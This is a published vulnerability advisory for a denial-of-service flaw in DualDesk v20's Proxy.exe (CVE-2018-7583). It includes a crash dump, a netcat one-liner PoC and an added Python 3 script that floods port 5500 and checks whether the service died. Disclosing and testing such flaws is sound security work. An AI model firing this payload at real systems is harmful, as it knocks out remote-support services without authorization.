[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DUALDESK-v20-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security


Vendor:
===============
www.dualdesk.com


Product:
===========
DualDesk v20

DualDesk is remote support software, sold as a one-time purchase, that lets technical support staff
remotely assist a PC anywhere on the internet, through firewalls, in seconds and with no configuration.


Vulnerability Type:
===================
Denial Of Service


CVE Reference:
==============
CVE-2018-7583


Security Issue:
================
Remote unauthenticated attackers can crash the "Proxy.exe" server component of the DualDesk application,
which listens on TCP port 5500, by sending it a long string of junk characters. The process is terminated
by a fast-fail with code 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN, reported by the debugger as "Security
check failure or stack buffer overrun"). Because the /GS stack-cookie check aborts the process before the
corrupted stack frame is ever used, the issue is classed as a denial of service rather than code execution.
Note that the register dump below is the state of the thread the debugger broke on (blocked in
ntdll!NtWaitForMultipleObjects), not the frame that overran.

(d24.d60): Security check failure or stack buffer overrun - code c0000409 (first/second chance not available)
eax=00000000 ebx=0257f1c0 ecx=00000000 edx=00000000 esi=00000002 edi=00000000
eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtWaitForMultipleObjects+0x15:
77c6016d 83c404 add esp,4


Exploit/POC:
=============
Start the DualDesk proxy with "Run Proxy as Application".

Generate 8000 bytes of junk (Python 2 print syntax, as used by the original advisory):

C:\>python -c "print 'a'*8000" > crash.txt

Pipe the file into the listening port with netcat:

C:\>type crash.txt | nc.exe localhost 5500

Crash!!!


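The same PoC as a Python 3 script, added here as an example and not part of the original advisory. It sends the junk string to the listener and then checks whether the port still accepts connections, so a crash is observed rather than eyeballed. It assumes (the advisory does not say so explicitly) that once Proxy.exe dies the port stops accepting connections, so a failed reconnect after the send is used as the crash indicator; host and port default to the advisory's localhost:5500. The `start_sink`/`stop_sink` helpers are a throwaway local listener, constructed so the script can be exercised offline without the product installed.

```python
"""
Added example (not from the original advisory): Python 3 version of the
DualDesk Proxy.exe DoS PoC with a before/after liveness check.

Assumption: a crashed Proxy.exe stops listening on its port, so a refused
reconnect after the send is treated as the crash signal.
"""
import socket
import threading
import time


def build_payload(length=8000, byte=b"a"):
    """Same junk as the advisory's python -c "print 'a'*8000" one-liner."""
    return byte * length


def probe_alive(host, port, timeout=2.0):
    """Return True if a TCP connect to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def send_payload(host, port, payload, timeout=5.0):
    """Send the payload in one connection; return bytes handed to the socket."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        return len(payload)


def crash_check(host="127.0.0.1", port=5500, length=8000, settle=2.0):
    """
    Probe, send, wait `settle` seconds for the process to die, probe again.
    'crashed' is True only if the listener was up before the send and no
    longer accepts connections afterwards (see assumption above).
    """
    before = probe_alive(host, port)
    sent = 0
    if before:
        try:
            sent = send_payload(host, port, build_payload(length))
        except OSError:
            # A reset mid-send is also consistent with the service dying.
            pass
        time.sleep(settle)
    after = probe_alive(host, port)
    return {"before": before, "sent": sent, "after": after,
            "crashed": before and not after}


def start_sink(host="127.0.0.1"):
    """Constructed stand-in listener on an ephemeral port that reads and
    discards everything; lets the functions above run without DualDesk."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return  # listening socket shut down: stop serving
            with conn:
                while conn.recv(65536):
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def stop_sink(srv):
    """Take the sink out of the listening state so connects are refused."""
    try:
        srv.shutdown(socket.SHUT_RDWR)  # wakes the thread blocked in accept()
    except OSError:
        pass
    srv.close()


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    print(crash_check(target))
```

Run it as `python3 poc.py <host>` against a machine with the proxy started; against the real target the expected result is `before: True` and `after: False`. The sink helper only proves the plumbing works (it never crashes), which is why the script reports `crashed: False` against it.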
Network Access:
===============
Remote


Severity:
=========
Medium


Disclosure Timeline:
=============================
Vendor Notification : February 4, 2018
Second attempt : February 17, 2018
CVE requested, assigned by Mitre : March 1, 2018
Public Disclosure : March 1, 2018


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).